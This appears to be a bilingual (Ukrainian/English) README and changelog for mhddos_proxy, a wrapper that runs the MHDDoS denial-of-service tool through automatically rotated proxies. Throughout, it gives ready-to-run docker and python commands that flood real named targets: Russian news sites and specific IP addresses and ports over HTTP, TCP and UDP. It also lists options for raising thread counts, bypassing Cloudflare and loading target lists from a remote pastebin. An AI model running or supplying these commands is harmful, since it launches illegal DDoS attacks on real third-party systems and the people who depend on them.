-
25.03.2022 Proxies check is now performed on the server-side. This allows to skip 2-3 minutes check on the client.
-
24.03.2022 Forked MHDDoS. Reasons:
- Multiple breaking commits in recent days.
- Slow response to the PRs/Issues.
- Need for more control over certain aspects, like socket timeout and ability to run MHDDoS in threads instead of proccesses
- Ability to change certain methods (DGB, CFB) to actually work - without the need to argue with the original maintainer (who is, again, slow to respond)
-
23.03.2022 Removed the ability to run DGB, BOMB and KILLER methods
- DGB - bad implementation, still hits the DDoS-Guard servers without affecting the target
- KILLER - may "kill" you machine by starting threads without any control
- BOMB - requires additional setup, which is not implemented yet. Will error if run anyway
Скрипт-обгортка для запуску потужного DDoS інструмента MHDDoS.
- Не потребує VPN - автоматично скачує і підбирає робочі проксі для заданих цілей, періодично їх оновлюючи
- Атака декількох цілей з автоматичним балансуванням навантаження
- Використовує різні методи для атаки і змінює їх в процесі роботи
- Простий та зрозумілий інтерфейс з іменованими параметрами
ВИМКНІТЬ VPN - використовуються проксі, VPN тільки заважатиме!
Неофіційний гайд - Детальний розбір MHDDoS_proxy
Встановіть і запустіть Docker
- Windows: https://docs.docker.com/desktop/windows/install/
- Mac: https://docs.docker.com/desktop/mac/install/
- Ubuntu: https://docs.docker.com/engine/install/ubuntu/
git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy.git
cd mhddos_proxy
git clone https://github.com/porthole-ascend-cinnamon/MHDDoS.git
python3 -m pip install -r MHDDoS/requirements.txt
Завантажте і встановіть Python та Git
- https://www.python.org/ftp/python/3.10.2/python-3.10.2-amd64.exe
- https://github.com/git-for-windows/git/releases/download/v2.35.1.windows.2/Git-2.35.1.2-64-bit.exe
Запускаємо Git Bash
git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy.git
cd mhddos_proxy
git clone https://github.com/porthole-ascend-cinnamon/MHDDoS.git
python -m pip install -r MHDDoS/requirements.txt
Зверніть увагу, використовується саме python а не python3.
https://github.com/localdotcom/mhddos-proxy-helm
HTTP(S) по URL
docker run -it --rm ghcr.io/porthole-ascend-cinnamon/mhddos_proxy https://ria.ru https://tass.ru
HTTP по IP + PORT
docker run -it --rm ghcr.io/porthole-ascend-cinnamon/mhddos_proxy 5.188.56.124:80 5.188.56.124:3606
TCP
docker run -it --rm ghcr.io/porthole-ascend-cinnamon/mhddos_proxy tcp://194.54.14.131:4477 tcp://194.54.14.131:22
UDP - ТУТ ПОТРІБНО ВКЛЮЧИТИ VPN
docker run -it --rm ghcr.io/porthole-ascend-cinnamon/mhddos_proxy udp://217.175.155.100:53
python3 runner.py https://ria.ru https://tass.ru
УСІ ПАРАМЕТРИ МОЖНА КОМБІНУВАТИ, можна вказувати і до і після переліку цілей
Змінити навантаження - -t XXXX
- кількість потоків, за замовчуванням - CPU * 1000
docker run -it --rm ghcr.io/porthole-ascend-cinnamon/mhddos_proxy -t 3000 https://ria.ru https://tass.ru
Щоб переглянути інформацію про хід атаки, додайте прапорець --debug
docker run -it --rm ghcr.io/porthole-ascend-cinnamon/mhddos_proxy --debug https://ria.ru https://tass.ru
Змінити частоту оновлення проксі (за замовчуванням - кожні 15 хвилин) - -p SECONDS
docker run -it --rm ghcr.io/porthole-ascend-cinnamon/mhddos_proxy -p 1200 https://ria.ru https://tass.ru
Цілі з віддаленого файла конфігурації - -c https://pastebin.com/raw/95D1jjzy
docker run -it --rm ghcr.io/porthole-ascend-cinnamon/mhddos_proxy -c https://pastebin.com/raw/95D1jjzy
Обрати метод(и) для HTTP(S) атаки (наприклад для обходу Cloudflare) - --http-methods CFB
Цей параметр тільки в кінці команди
Повний список див. тут, окрім DGB, BOMB та KILLER.
docker run -it --rm ghcr.io/porthole-ascend-cinnamon/mhddos_proxy https://ria.ru https://tass.ru --http-methods CFB
usage: runner.py target [target ...]
[-t THREADS]
[-p PERIOD]
[--rpc RPC]
[--debug]
[--http-methods METHOD [METHOD ...]]
positional arguments:
targets List of targets, separated by space
optional arguments:
-h, --help show this help message and exit
-c, --config URL URL to a config file (list of targets in plain text)
-t, --threads 2000 Total number of threads to run (default is CPU * 1000)
-p, --period 900 How often to update the proxies (default is 900)
--debug Enable debug output from MHDDoS
--rpc 2000 How many requests to send on a single proxy connection (default is 2000)
--http-methods GET List of HTTP(s) attack methods to use.
(default is GET, POST, STRESS, BOT, PPS)
Refer to MHDDoS docs for available options
(https://github.com/MHProDev/MHDDoS)
Wrapper script for running MHDDoS
- No VPN required - automatically downloads and selects working proxies for given targets
- Support for multiple targets with automatic load-balancing
- Uses multiple attack methods and switches between them
- Simpler interface with named arguments
git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy.git
cd mhddos_proxy
git clone https://github.com/porthole-ascend-cinnamon/MHDDoS.git
python3 -m pip install -r MHDDoS/requirements.txt
Download and install Python and Git
- https://www.python.org/ftp/python/3.10.2/python-3.10.2-amd64.exe
- https://github.com/git-for-windows/git/releases/download/v2.35.1.windows.2/Git-2.35.1.2-64-bit.exe
Let's run Git Bash
git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy.git
cd mhddos_proxy
git clone https://github.com/porthole-ascend-cinnamon/MHDDoS.git
python -m pip install -r MHDDoS/requirements.txt
Note that python is used instead of python3.
-
Ubuntu: https://docs.docker.com/engine/install/ubuntu/
docker pull ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest
docker run -it --rm ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest COMMAND
python3 runner.py COMMAND
usage: runner.py target [target ...]
[-t THREADS]
[-p PERIOD]
[--rpc RPC]
[--debug]
[--http-methods METHOD [METHOD ...]]
positional arguments:
targets List of targets, separated by space
optional arguments:
-h, --help show this help message and exit
-t, --threads 2000 Total number of threads to run (default is CPU * 1000)
-c, --config URL URL to a config file (list of targets in plain text)
-p, --period 900 How often to update the proxies (default is 900)
--debug Enable debug output from MHDDoS
--rpc 2000 How many requests to send on a single proxy connection (default is 2000)
--http-methods GET List of HTTP(s) attack methods to use.
(default is GET, POST, STRESS, BOT, PPS)
Refer to MHDDoS docs for available options
(https://github.com/MHProDev/MHDDoS)
python3 runner.py https://tvzvezda.ru 5.188.56.124:9000 tcp://194.54.14.131:4477 udp://217.175.155.100:53
docker run -it --rm ghcr.io/porthole-ascend-cinnamon/mhddos_proxy https://tvzvezda.ru 5.188.56.124:9000 tcp://194.54.14.131:4477 udp://217.175.155.100:53
Target specification
- HTTP(S) by URL -
https://tvzvezda.ru
orhttp://tvzvezda.ru
- HTTP by IP:PORT -
5.188.56.124:9000
- TCP by IP:PORT -
tcp://194.54.14.131:4477
- UDP by IP:PORT -
udp://217.175.155.100:53
- REQUIRES VPN
Increase load
python3 runner.py -t 3000 https://tvzvezda.ru
View DEBUG info (traffic)
python3 runner.py https://tvzvezda.ru --debug
Change proxy update interval
python3 runner.py -p 900 https://tvzvezda.ru
Specific HTTP(S) attack method(s)
python3 runner.py https://tvzvezda.ru --http-methods CFB CFBUAM
- Skip HTTP(S) proxies download for pure TCP workloads